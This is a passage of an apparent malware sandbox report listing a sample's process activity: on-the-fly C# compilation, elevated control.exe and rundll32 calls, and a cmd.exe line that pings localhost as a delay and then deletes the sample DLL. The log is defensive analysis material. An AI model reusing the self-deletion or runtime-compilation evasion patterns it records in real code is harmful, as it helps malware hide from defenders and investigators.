                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Target ID:20
                      Start time:12:43:08
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP"
                      Imagebase:0x7ff71aa90000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Target ID:21
                      Start time:12:43:12
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline
                      Imagebase:0x7ff61fe60000
                      File size:2739304 bytes
                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:.Net C# or VB.NET
                      Reputation:moderate

                      General

                      Target ID:22
                      Start time:12:43:13
                      Start date:04/05/2022
                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP"
                      Imagebase:0x7ff71aa90000
                      File size:47280 bytes
                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                      General

                      Target ID:23
                      Start time:12:43:18
                      Start date:04/05/2022
                      Path:C:\Windows\System32\control.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\control.exe -h
                      Imagebase:0x7ff7bf350000
                      File size:117760 bytes
                      MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:24
                      Start time:12:43:22
                      Start date:04/05/2022
                      Path:C:\Windows\System32\rundll32.exe
                      Wow64 process (32bit):false
                      Commandline:"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h
                      Imagebase:0x7ff6ed3d0000
                      File size:69632 bytes
                      MD5 hash:73C519F050C20580F8A62C849D49215A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language

                      General

                      Target ID:25
                      Start time:12:43:24
                      Start date:04/05/2022
                      Path:C:\Windows\explorer.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff6b8cf0000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                      General

                      Target ID:26
                      Start time:12:43:41
                      Start date:04/05/2022
                      Path:C:\Windows\System32\cmd.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll
                      Imagebase:0x7ff66fc20000
                      File size:273920 bytes
                      MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                      General

                      Target ID:28
                      Start time:12:43:42
                      Start date:04/05/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7c9170000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                      General

                      Target ID:29
                      Start time:12:43:42
                      Start date:04/05/2022
                      Path:C:\Windows\System32\PING.EXE
                      Wow64 process (32bit):false
                      Commandline:ping localhost -n 5
                      Imagebase:0x7ff67e070000
                      File size:21504 bytes
                      MD5 hash:6A7389ECE70FB97BFE9A570DB4ACCC3B
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language

                      Disassembly

                      No disassembly